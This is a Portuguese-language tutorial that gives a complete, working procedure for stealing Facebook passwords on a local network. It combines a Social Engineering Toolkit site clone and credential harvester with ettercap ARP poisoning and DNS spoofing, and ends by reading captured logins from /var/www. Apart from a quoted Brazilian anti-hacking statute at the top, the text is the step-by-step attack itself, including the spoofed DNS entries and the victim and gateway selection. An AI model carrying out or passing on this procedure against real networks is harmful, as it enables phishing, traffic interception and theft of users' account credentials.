Este é um exemplo prático de como pode ser realizado o envenenamento da rede para que seja realizada a captura de senhas de usuários que estão acessando o Facebook.
Atenção :
Como previsto na Lei 12.737/2012 no Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:
Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.(Lei Nº 12.737, de 30 de novembro de 2012).
Abra o aplicativo SET através do menu: Applications > Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit
Digite o número 1 Social-Engineering Attacks ( Ataque de Engenharia Social ).
Digite o número 2 Website Attack Vectors.
Digite o número 3 Credential Harvester Attack Method.
Digite o número 2 Site Cloner.
Digite o IP do Atacante host KALI 10.10.10.200.
Digite o endereço do site que deseja clonar no exemplo: https://www,facebook.com ou www.facebook.com.
Durante o processo de captura todos os dados serão armazenados em /var/www.
Edite o arquivo etter.dns para adicionar o novo destino da url www.facebook.com.
Linuxcd / vim /etc/ettercap/ettr.dns
Insira as linhas a seguir e salve o arquivo.
Linux# FACEBOOK facebook.com A 10.10.10.200 *.facebook.com A 10.10.10.200 www.facebook.com PTR 10.10.10.200
Certifique-se de qual é o Gateway da rede usando o comando route.
Linuxroute
Abra o aplicativo ettercap através do menu: Applications > Kali Linux > Sniffing/Spoofing > Network Sniffers > ettercap-graphical.
Clique em Sniff > Unified sniffing…
Selecione a Interface de Rede eth0.
Clique em Hosts > Scan for hosts.
3 Hosts foram encontrados, clique em Hosts > Hosts list para visualizá-los.
Selecione os hosts Gateway 10.10.10.2 e WIN-8 10.10.10.146 e clique em Add to Target 2.
Clique em Plugins > Manage the plugins.
De um duplo-clique em dns_spoof para ativar o plugin.
Clique em Mitm > Arp poisoning….
Selecione a opção Sniff remote conections.
O grupo com os hosts é criado, em seguida Clique em Start > Start sniffing.
O sniffing é iniciado.
No host WIN-8 10.10.10.146 acesse o site www.facebook.com e informe o e-mail e senha de acesso.
Ao explorar o diretório /var/www observe que foram criados 03 arquivos.
harvester_2015_02-17 10:53:37.023687.txt : Arquivo que contem todos os dados capturados como Usuário e Senha.
Basta abrir o arquivo harvester_2015_02-17 10:53:37.023687.txt para visualizar os dados capturados.